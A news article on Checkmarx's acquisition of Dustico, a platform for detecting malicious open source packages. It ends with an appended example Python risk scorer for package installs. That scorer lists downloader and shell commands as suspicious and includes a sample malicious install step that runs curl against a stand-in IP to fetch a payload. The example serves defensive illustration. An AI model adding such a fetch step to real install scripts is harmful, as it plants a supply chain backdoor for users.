Checkmarx’s Dustico acquisition bolsters the open source software supply chain

Application security testing (AST) company Checkmarx has acquired Dustico, a platform for detecting backdoors and other malicious activity in the open source software supply chain. Terms of the deal were not disclosed.

Combined with Checkmarx’s open source software composition analysis tool CxSCA, the Dustico platform will offer customers a “unified view into the risk, reputation, and behavior of open source packages” to help prevent supply chain attacks, the company said.

The software supply chain has emerged as a major area of focus for security-conscious companies, due in large part to the growing scourge of attacks that target businesses by exploiting vulnerabilities in “trusted” third-party software. The European Union’s (EU) cybersecurity agency ENISA recently published a report called Threat Landscape for Supply Chain Attacks, which predicted a fourfold increase in supply chain attacks in 2021 versus 2020, with notable events such as the SolarWinds breach impacting companies and government agencies around the globe.

The rise in such attacks can be attributed somewhat to the growing use of open source components in software development, a process that often leans on automated dependency managers that may download and install dozens or hundreds of open source packages as part of the software lifecycle process — some of which may contain critical vulnerabilities or malicious code deliberately inserted by bad actors.

A quick peek across the cybersecurity landscape reveals a concerted push to address security in the software supply chain. Just last week, ReversingLabs secured $56 million in venture capital funding to combat software supply chain attacks. Elsewhere, GitLab recently open-sourced Package Hunter to detect malicious code in dependencies, while Google introduced Supply Chain Levels for Software Artifacts (SLSA), touted as an end-to-end framework for “ensuring the integrity of software artifacts throughout the software supply chain.”

Unified

Founded in Israel in 2006, Checkmarx offers a range of software security products, such as integrated scanning tools for open source and proprietary source code, and has amassed a roster of big-name customers, including Sony, SAP, Deloitte, Visa, and Coca-Cola. Last year, private equity giant Hellman & Friedman acquired Checkmarx in a $1.15 billion deal.

Dustico, which was founded less than a year ago, has built a machine learning-powered platform that performs behavioral analysis of software packages to detect and avert would-be attackers in the open source software supply chain. Adopting a multi-pronged approach, Dustico checks the credibility of the package’s provider and project contributors while verifying the health of the package itself based on metrics such as update frequency and how well it is maintained. Dustico also checks for backdoors and any other form of malicious activity. The company is less focused on spotting vulnerabilities inadvertently introduced by human error than on seeking out code that looks legitimate but has ill intentions.

“When code has been written to deliberately hide its intent, it’s important to evaluate what the code does when you run it and who created it in the first place,” Checkmarx software composition analysis and open source evangelist Robert Haynes wrote in a blog post. “Evaluating what a piece of software does, what processes it creates, what ports it opens, and what connections it attempts to make are all critical indicators of the package’s intent.”
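As an added illustration of the signals described above (provider credibility, package health, and what a package does when installed), here is a small risk scorer that combines constructed package metadata with a constructed sandbox record of an install step. It is example code written for this page, not Dustico’s or Checkmarx’s; the thresholds, registry hosts and sample packages are assumptions.

```python
from dataclasses import dataclass, field
from datetime import date

TODAY = date(2021, 8, 10)  # constructed analysis date
ALLOWED_REGISTRY_HOSTS = ("pypi.org", "files.pythonhosted.org")  # assumed: registry traffic is expected
SUSPICIOUS_PROCESSES = ("curl", "wget", "bash -c", "powershell")   # downloaders/shells at install time

@dataclass
class PackageReport:
    """Constructed metadata plus sandbox observations for one package's install step."""
    name: str
    last_release: date
    publisher_account_age_days: int
    processes: list = field(default_factory=list)     # commands spawned during install
    ports_opened: list = field(default_factory=list)  # ports the install step listened on
    connections: list = field(default_factory=list)   # hosts contacted during install

def assess(report: PackageReport, today: date) -> tuple:
    """Return (risk score, findings) from credibility, health and observed behaviour.
    Weights are illustrative: behavioural indicators outweigh metadata ones."""
    score, findings = 0, []
    # Credibility: a brand-new publisher account is a weak but useful signal
    if report.publisher_account_age_days < 30:
        score += 2; findings.append("publisher account under 30 days old")
    # Health: an abandoned package accumulates unpatched vulnerabilities
    if (today - report.last_release).days > 365:
        score += 1; findings.append("no release in over a year")
    # Behaviour: an install step should not spawn downloaders/shells, listen, or phone home
    for proc in report.processes:
        if any(proc.startswith(p) for p in SUSPICIOUS_PROCESSES):
            score += 3; findings.append(f"install spawned downloader/shell: {proc}")
    if report.ports_opened:
        score += 3; findings.append(f"install opened listening port(s): {report.ports_opened}")
    for host in report.connections:
        if not host.endswith(ALLOWED_REGISTRY_HOSTS):
            score += 3; findings.append(f"install contacted unexpected host: {host}")
    return score, findings

# Constructed sample reports (not real packages; 203.0.113.0/24 is a documentation range)
BENIGN = PackageReport("good-utils", date(2021, 6, 1), 1200,
                       processes=["python setup.py install"],
                       connections=["files.pythonhosted.org"])
SUSPECT = PackageReport("good-utilz", date(2021, 8, 1), 5,
                        processes=["python setup.py install", "curl -s http://203.0.113.7/stage"],
                        ports_opened=[8443],
                        connections=["files.pythonhosted.org", "203.0.113.7"])

if __name__ == "__main__":
    for r in (BENIGN, SUSPECT):
        print(r.name, assess(r, TODAY))
```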